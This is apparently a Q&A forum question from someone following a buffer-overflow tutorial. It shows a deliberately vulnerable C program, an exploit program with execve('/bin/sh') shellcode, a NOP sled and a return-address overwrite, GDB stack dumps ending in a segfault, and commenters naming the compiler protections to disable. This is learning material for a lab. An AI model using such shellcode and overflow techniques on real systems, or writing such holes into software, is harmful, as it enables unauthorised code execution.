# Segmentation fault in exercise program

Tags: buffer-overflow, c, shellcode

I am going through this [video](https://www.youtube.com/watch?v=N0DBu3TGejI) on buffer overflows but am having some trouble replicating the demo. The issue is that I am getting a segmentation fault when I expect to get a shell at the end.
The idea is that the `HackYou` program runs a shell and I am then running the vulnerable `ExploitMe with GDB in that shell.

I am running this in a 64bit Kali Linux Virtualbox environment with memory randomisation disabled.

So far as aI can tell, all my code matches the demo.
One thing I have noticed though is this.  `0x0000000000001139 <+4>: sub    $0x60,%rsp`. In the demo code the size of the buffer variable is `0x50`.

96 bytes vs 80 bytes.

From what I understand, the intended return address should be, `0x7fffffffe060`.

I can the see the shellcode being introduced to the stack and I can see the new return address shown as intended. But I'm not sure what is preventing it running as intended and spawning a shell within GDB.

`ExploitMe.c`

```
#include<stdio.h>
#include<string.h>

main(int argc, char **argv)
{
    char buffer[80];
    strcpy(buffer, argv[1]);
    return 1;
}
```

`HackYou.c`

```
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

char shellcode[] =
"\x31\xc0"
"\x50"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3"
"\x99"
"\x52"
"\x53"
"\x89\xe1"
"\xb0\x0b"
"\xcd\x80"
;

char retaddr[] = "\x60\xe0\xff\xff\xff\x7f";

#define NOP 0x90
main()
{
    char buffer[96]; 
    memset(buffer, NOP, 96);
    memcpy(buffer, "EGG=", 4);
    memcpy(buffer+4, shellcode, 24);
    memcpy(buffer+88, retaddr, 4);
    memcpy(buffer+92, "\x00\x00\x00\x00", 4);
    putenv(buffer);
    system("/bin/sh");
    return 0;
}
```

`disas main`

```
Dump of assembler code for function main:
   0x0000000000001135 <+0>: push   %rbp
   0x0000000000001136 <+1>: mov    %rsp,%rbp
   0x0000000000001139 <+4>: sub    $0x60,%rsp
   0x000000000000113d <+8>: mov    %edi,-0x54(%rbp)
   0x0000000000001140 <+11>:    mov    %rsi,-0x60(%rbp)
   0x0000000000001144 <+15>:    mov    -0x60(%rbp),%rax
   0x0000000000001148 <+19>:    add    $0x8,%rax
   0x000000000000114c <+23>:    mov    (%rax),%rdx
   0x000000000000114f <+26>:    lea    -0x50(%rbp),%rax
   0x0000000000001153 <+30>:    mov    %rdx,%rsi
   0x0000000000001156 <+33>:    mov    %rax,%rdi
   0x0000000000001159 <+36>:    callq  0x1030 <strcpy@plt>
   0x000000000000115e <+41>:    mov    $0x1,%eax
   0x0000000000001163 <+46>:    leaveq 
   0x0000000000001164 <+47>:    retq   
End of assembler dump.
```

`(gdb) run $EGG`

```
(gdb) x/24xw $rsp
0x7fffffffe060: 0xffffe1a8  0x00007fff  0xffffe096  0x00000002
0x7fffffffe070: 0x00000001  0x00000000  0xf7e939b5  0x00007fff
0x7fffffffe080: 0x00000000  0x00000000  0x555551bd  0x00005555
0x7fffffffe090: 0xf7fe42a0  0x00007fff  0x00000000  0x00000000
0x7fffffffe0a0: 0x55555170  0x00005555  0x55555050  0x00005555
0x7fffffffe0b0: 0xffffe1a0  0x00007fff  0x00000000  0x00000000

(gdb) c
Continuing.

(gdb) x/24xw argv[1]
0x7fffffffe4c4: 0x6850c031  0x68732f6e  0x622f2f68  0x99e38969
0x7fffffffe4d4: 0xe1895352  0x80cd0bb0  0x90909090  0x90909090
0x7fffffffe4e4: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe4f4: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe504: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe514: 0x90909090  0xffffe060  0x5f534c00  0x4f4c4f43

(gdb) x/40xw $rsp
0x7fffffffe060: 0xffffe1a8  0x00007fff  0xffffe096  0x00000002
0x7fffffffe070: 0x6850c031  0x68732f6e  0x622f2f68  0x99e38969
0x7fffffffe080: 0xe1895352  0x80cd0bb0  0x90909090  0x90909090
0x7fffffffe090: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe0a0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe0b0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe0c0: 0x90909090  0xffffe060  0xf7e14b00  0x00007fff
0x7fffffffe0d0: 0x00000000  0x00000000  0xffffe1a8  0x00007fff
0x7fffffffe0e0: 0x00040000  0x00000002  0x55555135  0x00005555
0x7fffffffe0f0: 0x00000000  0x00000000  0x12e5cd41  0xd8327cdb

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e14b0d in __libc_start_main (main=0x555555555135 <main>, argc=2, argv=0x7fffffffe1a8, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe198) at ../csu/libc-start.c:310
310 ../csu/libc-start.c: No such file or directory.
```

Comment: `0x7fffffffe060` doesn't look like a typical return address and more like an address poiting to the stack itself and if your code wasn't compiled with `execstack` then it wouldn't allow to execute code on the stack

Comment: I compiled like so, `gcc -ggdb -o HackYou HackYou.c`. Is that not right?

Comment: You need to compile the `ExploitMe.c` with the options `-fno-stack-protector  -mpreferred-stack-boundary=4`. I'm not saying this is sufficient for you to exploit it but it is necessary to overcome protections that the compile inserts into the binary.

Comment: Ok thanks. Is this line in the `rsp` the protection that the compiler puts in? `0x7fffffffe060: 0xffffe1a8  0x00007fff  0xffffe096  0x00000002`. That offset seems to be what is throwing the exploit off